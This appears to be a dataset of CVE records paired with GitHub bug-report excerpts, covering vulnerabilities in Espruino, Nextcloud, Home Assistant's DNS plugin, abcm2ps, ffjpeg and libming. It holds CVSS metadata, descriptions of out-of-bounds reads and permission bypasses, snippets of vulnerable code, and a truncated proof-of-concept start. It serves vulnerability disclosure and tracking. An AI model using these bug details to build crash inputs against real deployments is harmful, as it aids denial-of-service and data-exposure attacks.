## Environment ``` MacOS Version : 11.5.2 (Intel) Commit : a8c74cbe557924dec90cc0da4f7a6a180a1a47d6 Version : 2v11 ``` ## Build ``` CFLAGS += -fsanitize=address -fno-omit-frame-pointer ``` ## Proof of concept ``` function main() { var foo = Int16Array(31860); var buf = fo...
stack-overflow jsvar.c:74 in jsvGetNextSibling
https://api.github.com/repos/espruino/Espruino/issues/2136/comments
1
2022-01-29T16:21:46Z
2022-06-08T14:50:40Z
https://github.com/espruino/Espruino/issues/2136
1,118,260,466
2,136
3,297
CVE-2021-41239
2022-03-08T18:15:07.873
Nextcloud server is a self hosted system designed to provide cloud style services. In affected versions the User Status API did not consider the user enumeration settings by the administrator. This allowed a user to enumerate other users on the instance, even when user listings where disabled. It is recommended that th...
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5, "confidentialityImpact": "PARTIAL", ...
[ { "source": "security-advisories@github.com", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/nextcloud/security-advisories/security/advisories/GHSA-g722-cm3h-8wrx" }, { "source": "security-advisories@github.com", "tags": [ "Issue Tracki...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:nextcloud:nextcloud_server:*:*:*:*:*:*:*:*", "matchCriteriaId": "FE354750-B4B3-4F0A-8B59-472C527BC7B2", "versionEndExcluding": "20.0.14", "versionEndIncluding": null, "versio...
[ "862" ]
862
https://github.com/nextcloud/server/issues/27122
[ "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "nextcloud", "server" ]
There should be an option to globally disable the "Last statuses" widget. It leaks account names, which might be the desired behaviour, but might as well be not. On "semi-public" Nextcloud instances you usually don't want to expose other users to each other, which is also why e.g. `shareapi_allow_share_dialog_user_e...
user_status "last statuses" widget leaks account names
https://api.github.com/repos/nextcloud/server/issues/27122/comments
2
2021-05-26T16:08:07Z
2021-10-20T10:27:56Z
https://github.com/nextcloud/server/issues/27122
902,616,998
27,122
3,298
CVE-2021-41241
2022-03-08T19:15:07.927
Nextcloud server is a self hosted system designed to provide cloud style services. The groupfolders application for Nextcloud allows sharing a folder with a group of people. In addition, it allows setting "advanced permissions" on subfolders, for example, a user could be granted access to the groupfolder but not specif...
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 4, "confidentialityImpact": "PARTIAL", ...
[ { "source": "security-advisories@github.com", "tags": [ "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/nextcloud/groupfolders/issues/1692" }, { "source": "security-advisories@github.com", "tags": [ "Issue Tracking", "Third Pa...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:nextcloud:nextcloud_server:*:*:*:*:*:*:*:*", "matchCriteriaId": "FE354750-B4B3-4F0A-8B59-472C527BC7B2", "versionEndExcluding": "20.0.14", "versionEndIncluding": null, "versio...
[ "862" ]
862
https://github.com/nextcloud/groupfolders/issues/1692
[ "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "nextcloud", "groupfolders" ]
Example: Employee list / NC users: MA1 site manager MA2 accountant MA3 project employee Lisa MA4 project employee Hans NC folder structure (group folder): Group folder company location Berlin ...├── Administration ..........├── accounting ...├── projects ..........├── Project A ..........├── Project B...
Groupfolders for which a user has no reading-rights (Advanced Permissions) can still be copied and read out!
https://api.github.com/repos/nextcloud/groupfolders/issues/1692/comments
6
2021-10-11T13:47:33Z
2021-11-04T16:30:15Z
https://github.com/nextcloud/groupfolders/issues/1692
1,022,729,010
1,692
3,299
CVE-2020-36517
2022-03-10T17:41:21.183
An information leak in Nabu Casa Home Assistant Operating System and Home Assistant Supervised 2022.03 allows a DNS operator to gain knowledge about internal network resources via the hardcoded DNS resolver configuration.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5, "confidentialityImpact": "PARTIAL", ...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Vendor Advisory" ], "url": "https://community.home-assistant.io/t/ha-os-dns-setting-configuration-not-respected/356572" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], ...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:home-assistant:home-assistant:2022.03:*:*:*:*:*:*:*", "matchCriteriaId": "08694ACE-E7A9-4840-A2D2-851527D6DEDF", "versionEndExcluding": null, "versionEndIncluding": null, "ve...
[ "203" ]
203
https://github.com/home-assistant/plugin-dns/issues/17
[ "Third Party Advisory" ]
github.com
[ "home-assistant", "plugin-dns" ]
I've noticed that when I power cycle my machine running HassOS, that local DNS resolution doesn't work at all. Nearly all of my ESP8266 devices rely upon local DNS resolution so most devices stop working. The local DNS is set via DHCP. I don't set any upstream DNS, everything is supposed to be forwarded through my l...
DNS Plugin is ignoring my local DNS on startup
https://api.github.com/repos/home-assistant/plugin-dns/issues/17/comments
1
2020-12-08T20:38:20Z
2021-01-20T01:15:17Z
https://github.com/home-assistant/plugin-dns/issues/17
759,762,237
17
3,300
CVE-2020-36517
2022-03-10T17:41:21.183
An information leak in Nabu Casa Home Assistant Operating System and Home Assistant Supervised 2022.03 allows a DNS operator to gain knowledge about internal network resources via the hardcoded DNS resolver configuration.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5, "confidentialityImpact": "PARTIAL", ...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Vendor Advisory" ], "url": "https://community.home-assistant.io/t/ha-os-dns-setting-configuration-not-respected/356572" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], ...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:home-assistant:home-assistant:2022.03:*:*:*:*:*:*:*", "matchCriteriaId": "08694ACE-E7A9-4840-A2D2-851527D6DEDF", "versionEndExcluding": null, "versionEndIncluding": null, "ve...
[ "203" ]
203
https://github.com/home-assistant/plugin-dns/issues/20
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "home-assistant", "plugin-dns" ]
In home assistant, if I use hostnames in configuration.yaml they fail to resolve (eg using platform snmp ). Using the corresponding IP addresses works, but is far from ideal and means I have to use fixed IP addresses and configuration becomes less unreadable and requires more maintenance. Trying to work out what is ...
Not resolving local host names
https://api.github.com/repos/home-assistant/plugin-dns/issues/20/comments
105
2020-12-26T11:35:40Z
2025-05-07T16:59:57Z
https://github.com/home-assistant/plugin-dns/issues/20
774,861,780
20
3,301
CVE-2020-36517
2022-03-10T17:41:21.183
An information leak in Nabu Casa Home Assistant Operating System and Home Assistant Supervised 2022.03 allows a DNS operator to gain knowledge about internal network resources via the hardcoded DNS resolver configuration.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5, "confidentialityImpact": "PARTIAL", ...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Vendor Advisory" ], "url": "https://community.home-assistant.io/t/ha-os-dns-setting-configuration-not-respected/356572" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], ...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:home-assistant:home-assistant:2022.03:*:*:*:*:*:*:*", "matchCriteriaId": "08694ACE-E7A9-4840-A2D2-851527D6DEDF", "versionEndExcluding": null, "versionEndIncluding": null, "ve...
[ "203" ]
203
https://github.com/home-assistant/plugin-dns/issues/22
[ "Issue Tracking", "Third Party Advisory" ]
github.com
[ "home-assistant", "plugin-dns" ]
The CoreDNS module is Home assistant is using CloudFlare DNS-over-TLS by default. This is basically exfilling my private data to a commercial 3rd party without my permission. There is no currently no way to disable this functionality. The CoreDNS module also attempts to lookup IPv6 AAAA records using CloudFlare when...
Use of CloudFlare DNS, Privacy Breach
https://api.github.com/repos/home-assistant/plugin-dns/issues/22/comments
19
2021-01-18T12:01:39Z
2021-01-30T13:45:35Z
https://github.com/home-assistant/plugin-dns/issues/22
788,210,168
22
3,302
CVE-2020-36517
2022-03-10T17:41:21.183
An information leak in Nabu Casa Home Assistant Operating System and Home Assistant Supervised 2022.03 allows a DNS operator to gain knowledge about internal network resources via the hardcoded DNS resolver configuration.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5, "confidentialityImpact": "PARTIAL", ...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Vendor Advisory" ], "url": "https://community.home-assistant.io/t/ha-os-dns-setting-configuration-not-respected/356572" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], ...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:home-assistant:home-assistant:2022.03:*:*:*:*:*:*:*", "matchCriteriaId": "08694ACE-E7A9-4840-A2D2-851527D6DEDF", "versionEndExcluding": null, "versionEndIncluding": null, "ve...
[ "203" ]
203
https://github.com/home-assistant/plugin-dns/issues/50
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "home-assistant", "plugin-dns" ]
Since dns upgrade to 2021.06.0, my complete hassio setup is having performance issues. I am running haos on Raspberry Pi 1B. It's an old pi, but before dns 2021.06.0 everything was running without issues and I had no reason to upgrade hardware. Since dns upgrade, coredns will eventually get stuck at more than 60% CPU...
performance impact after dns update to 2021.06.0
https://api.github.com/repos/home-assistant/plugin-dns/issues/50/comments
8
2021-06-30T12:07:56Z
2022-04-25T16:25:28Z
https://github.com/home-assistant/plugin-dns/issues/50
933,637,335
50
3,303
CVE-2020-36517
2022-03-10T17:41:21.183
An information leak in Nabu Casa Home Assistant Operating System and Home Assistant Supervised 2022.03 allows a DNS operator to gain knowledge about internal network resources via the hardcoded DNS resolver configuration.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5, "confidentialityImpact": "PARTIAL", ...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Vendor Advisory" ], "url": "https://community.home-assistant.io/t/ha-os-dns-setting-configuration-not-respected/356572" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], ...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:home-assistant:home-assistant:2022.03:*:*:*:*:*:*:*", "matchCriteriaId": "08694ACE-E7A9-4840-A2D2-851527D6DEDF", "versionEndExcluding": null, "versionEndIncluding": null, "ve...
[ "203" ]
203
https://github.com/home-assistant/plugin-dns/issues/51
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "home-assistant", "plugin-dns" ]
Ha is configured with a local dns resolver, while all other means of resolving are blocked on our home automation subnet. When (re)started, HA dns runs perfectly fine, and can resolve all queries through the assigned server. ``` ha dns info host: 172.30.32.3 locals: - dns://192.168.111.1 servers: - dns://19...
Dns stops resolving within hours
https://api.github.com/repos/home-assistant/plugin-dns/issues/51/comments
9
2021-07-11T20:22:04Z
2022-04-25T16:22:11Z
https://github.com/home-assistant/plugin-dns/issues/51
941,525,972
51
3,304
CVE-2020-36517
2022-03-10T17:41:21.183
An information leak in Nabu Casa Home Assistant Operating System and Home Assistant Supervised 2022.03 allows a DNS operator to gain knowledge about internal network resources via the hardcoded DNS resolver configuration.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5, "confidentialityImpact": "PARTIAL", ...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Vendor Advisory" ], "url": "https://community.home-assistant.io/t/ha-os-dns-setting-configuration-not-respected/356572" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], ...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:home-assistant:home-assistant:2022.03:*:*:*:*:*:*:*", "matchCriteriaId": "08694ACE-E7A9-4840-A2D2-851527D6DEDF", "versionEndExcluding": null, "versionEndIncluding": null, "ve...
[ "203" ]
203
https://github.com/home-assistant/plugin-dns/issues/53
[ "Exploit", "Third Party Advisory" ]
github.com
[ "home-assistant", "plugin-dns" ]
Applications should not hard-code their own DNS resolvers; they should use the configuration provided by the network (via DHCP) or by the user, perhaps with an overridable default if no other option exists. This is an anti-pattern: https://github.com/home-assistant/plugin-dns/blob/be7b7e7fc4460ef31483882e743ba4e3b62f...
Don't hard-code upstream DNS resolvers
https://api.github.com/repos/home-assistant/plugin-dns/issues/53/comments
2
2021-08-17T02:16:14Z
2021-09-16T16:56:17Z
https://github.com/home-assistant/plugin-dns/issues/53
972,238,371
53
3,305
CVE-2020-36517
2022-03-10T17:41:21.183
An information leak in Nabu Casa Home Assistant Operating System and Home Assistant Supervised 2022.03 allows a DNS operator to gain knowledge about internal network resources via the hardcoded DNS resolver configuration.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5, "confidentialityImpact": "PARTIAL", ...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Vendor Advisory" ], "url": "https://community.home-assistant.io/t/ha-os-dns-setting-configuration-not-respected/356572" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], ...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:home-assistant:home-assistant:2022.03:*:*:*:*:*:*:*", "matchCriteriaId": "08694ACE-E7A9-4840-A2D2-851527D6DEDF", "versionEndExcluding": null, "versionEndIncluding": null, "ve...
[ "203" ]
203
https://github.com/home-assistant/plugin-dns/issues/54
[ "Exploit", "Third Party Advisory" ]
github.com
[ "home-assistant", "plugin-dns" ]
ESPhome devices show up being "Online" only a few minutes after booting the system. After that, they turn to "Offline", although they are still online. mDNS resolving seems to breakdown within a few minutes after rebooting the OS. Running Home Assistant Operating System, which is, according to the site, the recommen...
.local named devices (i.e. ESPHOME devices) only resolve for a few minutes after booting HA
https://api.github.com/repos/home-assistant/plugin-dns/issues/54/comments
13
2021-08-25T19:14:14Z
2022-04-25T16:26:23Z
https://github.com/home-assistant/plugin-dns/issues/54
979,542,869
54
3,306
CVE-2020-36517
2022-03-10T17:41:21.183
An information leak in Nabu Casa Home Assistant Operating System and Home Assistant Supervised 2022.03 allows a DNS operator to gain knowledge about internal network resources via the hardcoded DNS resolver configuration.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5, "confidentialityImpact": "PARTIAL", ...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Vendor Advisory" ], "url": "https://community.home-assistant.io/t/ha-os-dns-setting-configuration-not-respected/356572" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], ...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:home-assistant:home-assistant:2022.03:*:*:*:*:*:*:*", "matchCriteriaId": "08694ACE-E7A9-4840-A2D2-851527D6DEDF", "versionEndExcluding": null, "versionEndIncluding": null, "ve...
[ "203" ]
203
https://github.com/home-assistant/plugin-dns/issues/6
[ "Exploit", "Third Party Advisory" ]
github.com
[ "home-assistant", "plugin-dns" ]
**HassOS release with the issue:** - Frontend -> Configuration -> Info ``` arch x86_64 chassis vm dev false docker true docker_version 19.03.11 hassio true host_os HassOS 4.13 installation_type Home Assistant OS os_name Linux os_version 5.4.63 python_version 3.8.5 supervisor 247 timezone Europe/Brussel...
DNS server settings ignored for resolving lan hosts.
https://api.github.com/repos/home-assistant/plugin-dns/issues/6/comments
6
2020-10-09T08:33:09Z
2020-11-14T10:50:28Z
https://github.com/home-assistant/plugin-dns/issues/6
719,313,704
6
3,307
CVE-2020-36517
2022-03-10T17:41:21.183
An information leak in Nabu Casa Home Assistant Operating System and Home Assistant Supervised 2022.03 allows a DNS operator to gain knowledge about internal network resources via the hardcoded DNS resolver configuration.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5, "confidentialityImpact": "PARTIAL", ...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Vendor Advisory" ], "url": "https://community.home-assistant.io/t/ha-os-dns-setting-configuration-not-respected/356572" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], ...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:home-assistant:home-assistant:2022.03:*:*:*:*:*:*:*", "matchCriteriaId": "08694ACE-E7A9-4840-A2D2-851527D6DEDF", "versionEndExcluding": null, "versionEndIncluding": null, "ve...
[ "203" ]
203
https://github.com/home-assistant/plugin-dns/issues/64
[ "Exploit", "Third Party Advisory" ]
github.com
[ "home-assistant", "plugin-dns" ]
CoreDNS is configured to healthcheck the Cloudflare fallback every 5 minutes, however in practice, a check is performed once a minute (and retries are generated when it fails). The `fallback` directive also causes healthchecks at startup, which can create substantial query rates. This is also why users have repor...
CoreDNS is misconfigured leading to unexpected healthcheck behaviour
https://api.github.com/repos/home-assistant/plugin-dns/issues/64/comments
11
2021-11-06T16:24:00Z
2022-04-25T16:21:40Z
https://github.com/home-assistant/plugin-dns/issues/64
1,046,544,256
64
3,308
CVE-2020-36517
2022-03-10T17:41:21.183
An information leak in Nabu Casa Home Assistant Operating System and Home Assistant Supervised 2022.03 allows a DNS operator to gain knowledge about internal network resources via the hardcoded DNS resolver configuration.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5, "confidentialityImpact": "PARTIAL", ...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Vendor Advisory" ], "url": "https://community.home-assistant.io/t/ha-os-dns-setting-configuration-not-respected/356572" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], ...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:home-assistant:home-assistant:2022.03:*:*:*:*:*:*:*", "matchCriteriaId": "08694ACE-E7A9-4840-A2D2-851527D6DEDF", "versionEndExcluding": null, "versionEndIncluding": null, "ve...
[ "203" ]
203
https://github.com/home-assistant/plugin-dns/issues/70
[ "Exploit", "Third Party Advisory" ]
github.com
[ "home-assistant", "plugin-dns" ]
### Describe the issue you are experiencing Home Assistant OS always gets configured to load-balance between my DNS resolver and Cloudflare's. I already looked under every stone, but there's no way to disable this behavior using configuration options. So if I use DNS names configured by my router instead of hard-co...
Home Assistant OS leaks private host names to cloudflare DNS service (CVE-2020-36517)
https://api.github.com/repos/home-assistant/plugin-dns/issues/70/comments
13
2022-01-15T15:35:56Z
2023-12-11T05:21:43Z
https://github.com/home-assistant/plugin-dns/issues/70
1,104,812,559
70
3,309
CVE-2021-32434
2022-03-10T17:42:14.277
abcm2ps v8.14.11 was discovered to contain an out-of-bounds read in the function calculate_beam at draw.c.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE...
[ { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/leesavide/abcm2ps/commit/2f56e1179cab6affeb8afa9d6c324008fe40d8e3" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Adviso...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:abcm2ps_project:abcm2ps:8.14.11:*:*:*:*:*:*:*", "matchCriteriaId": "F1915B5A-15EE-4267-9DBE-0827CA3F709E", "versionEndExcluding": null, "versionEndIncluding": null, "versionS...
[ "125" ]
125
https://github.com/leesavide/abcm2ps/issues/83
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "leesavide", "abcm2ps" ]
Version 0cf4a55 In function calculate_beam() in draw.c . There is out of bounds read in array min_tb at line 357 and 359, the flaw will cause crash. ``` if (s->nhd == 0) stem_err = min_tb[0][(unsigned) s->nflags]; else stem_err = min_tb[1][(unsigned) s->nflags]; ``` The (unsigned) s->nflags can be...
Out-of-bounds read in draw.c in calculate_beam
https://api.github.com/repos/lewdlime/abcm2ps/issues/83/comments
0
2021-04-27T02:14:17Z
2022-03-11T05:28:52Z
https://github.com/lewdlime/abcm2ps/issues/83
868,374,057
83
3,310
CVE-2021-32435
2022-03-10T17:42:14.457
Stack-based buffer overflow in the function get_key in parse.c of abcm2ps v8.14.11 allows remote attackers to cause a Denial of Service (DoS) via unspecified vectors.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE...
[ { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/leesavide/abcm2ps/commit/3169ace6d63f6f517a64e8df0298f44a490c4a15" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Adviso...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:abcm2ps_project:abcm2ps:8.14.11:*:*:*:*:*:*:*", "matchCriteriaId": "F1915B5A-15EE-4267-9DBE-0827CA3F709E", "versionEndExcluding": null, "versionEndIncluding": null, "versionS...
[ "787" ]
787
https://github.com/leesavide/abcm2ps/issues/84
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "leesavide", "abcm2ps" ]
Version 0cf4a55 Stack buffer over found in parse.c in function get_key(). The root cause maybe is in function c_set_k_acc(), the array `accs` and `pits` size is 8. If `s->u.key.sf` bigger than 7 , then the array `accs` and `pits` will access out of index and corrupt the stack, if the value of `s->u.key.sf` is...
stack buffer overflow in function get_key() in parse.c
https://api.github.com/repos/lewdlime/abcm2ps/issues/84/comments
0
2021-04-27T03:41:52Z
2022-03-11T05:31:24Z
https://github.com/lewdlime/abcm2ps/issues/84
868,424,804
84
3,311
CVE-2021-32436
2022-03-10T17:42:14.683
An out-of-bounds read in the function write_title() in subs.c of abcm2ps v8.14.11 allows remote attackers to cause a Denial of Service (DoS) via unspecified vectors.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE...
[ { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/leesavide/abcm2ps/commit/2f56e1179cab6affeb8afa9d6c324008fe40d8e3" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Thi...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:abcm2ps_project:abcm2ps:8.14.11:*:*:*:*:*:*:*", "matchCriteriaId": "F1915B5A-15EE-4267-9DBE-0827CA3F709E", "versionEndExcluding": null, "versionEndIncluding": null, "versionS...
[ "125" ]
125
https://github.com/leesavide/abcm2ps/issues/85
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "leesavide", "abcm2ps" ]
In Version 0cf4a55 Out-of-bounds read found in function write_title() in subs.c. The flow allows attackers to cause denial of service. Here didn't check whether `&s->text[2]` is valid . gdb info: ``` ─── source:subs.c+1465 ──── 1460 void write_title(struct SYMBOL *s) 1461 { 1462 char *p...
out-of-bounds read in function write_title() in subs.c
https://api.github.com/repos/lewdlime/abcm2ps/issues/85/comments
4
2021-04-27T07:57:56Z
2022-03-11T05:35:08Z
https://github.com/lewdlime/abcm2ps/issues/85
868,574,361
85
3,312
CVE-2021-34122
2022-03-10T17:42:36.623
The function bitstr_tell at bitstr.c in ffjpeg commit 4ab404e has a NULL pointer dereference.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Patch", "Third Party Advisory" ], "url": "https://github.com/rockcarry/ffjpeg/issues/36" }, { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/rockca...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:rockcarry:ffjpeg:*:*:*:*:*:*:*:*", "matchCriteriaId": "B275DEF0-B89A-4794-8276-E4BF906BBB00", "versionEndExcluding": "2021-03-16", "versionEndIncluding": null, "versionStartE...
[ "476" ]
476
https://github.com/rockcarry/ffjpeg/issues/36
[ "Exploit", "Patch", "Third Party Advisory" ]
github.com
[ "rockcarry", "ffjpeg" ]
Hi, There is null pointer dereference in function bitstr_tell() and bitstr_close() in bitstr.c. Didn't check whether the stream is valid . ``` long bitstr_tell(void *stream) { int type = *(int*)stream; if (!stream) return EOF; ... } int bitstr_close(void *stream) { int type = *(int*...
null pointer dereference in function bitstr_tell() in bitstr.c
https://api.github.com/repos/rockcarry/ffjpeg/issues/36/comments
4
2021-05-13T09:08:27Z
2021-05-17T05:51:39Z
https://github.com/rockcarry/ffjpeg/issues/36
890,871,244
36
3,313
CVE-2021-34338
2022-03-10T17:42:36.847
Ming 0.4.8 has an out-of-bounds buffer overwrite issue in the function getName() in decompiler.c file that causes a direct segmentation fault and leads to denial of service.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE...
[ { "source": "patrick@puiterwijk.org", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1969616" }, { "source": "patrick@puiterwijk.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:libming:ming:0.4.8:*:*:*:*:*:*:*", "matchCriteriaId": "B2ADA512-48F0-4FC4-8614-0212A9799B56", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding...
[ "787" ]
787
https://github.com/libming/libming/issues/201
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "libming", "libming" ]
Hi, there. There is a segmentation fault in the newest master branch 04aee52. Here is the reproducing command: ~~~~ swftophp poc ~~~~ POC: [seg-decompile457.zip](https://github.com/libming/libming/files/5118022/seg-decompile457.zip) Here is the reproduce trace reported by ASAN: ~~~~ ==19422==ERROR: Addr...
Segmentation fault in function getName, decompile.c:457
https://api.github.com/repos/libming/libming/issues/201/comments
0
2020-08-24T13:27:16Z
2020-08-24T13:30:07Z
https://github.com/libming/libming/issues/201
684,668,891
201
3,314
CVE-2021-34339
2022-03-10T17:42:37.283
Ming 0.4.8 has an out-of-bounds buffer access issue in the function getString() in decompiler.c file that causes a direct segmentation fault and leads to denial of service.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE...
[ { "source": "patrick@puiterwijk.org", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1969607" }, { "source": "patrick@puiterwijk.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https:/...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:libming:ming:0.4.8:*:*:*:*:*:*:*", "matchCriteriaId": "B2ADA512-48F0-4FC4-8614-0212A9799B56", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding...
[ "787" ]
787
https://github.com/libming/libming/issues/202
[ "Exploit", "Third Party Advisory" ]
github.com
[ "libming", "libming" ]
Hi, there. There is a segmentation fault in the newest master branch 04aee52. Here is the reproducing command: ~~~~ swftophp poc ~~~~ POC: [seg-decompile380.zip](https://github.com/libming/libming/files/5118100/seg-decompile380.zip) Here is the reproduce trace reported by ASAN: ~~~~ ==187067==ERROR: A...
Segmentation fault in function getString, decompile.c:380
https://api.github.com/repos/libming/libming/issues/202/comments
1
2020-08-24T13:33:55Z
2020-08-24T14:49:29Z
https://github.com/libming/libming/issues/202
684,675,767
202
3,315
CVE-2021-34340
2022-03-10T17:42:37.657
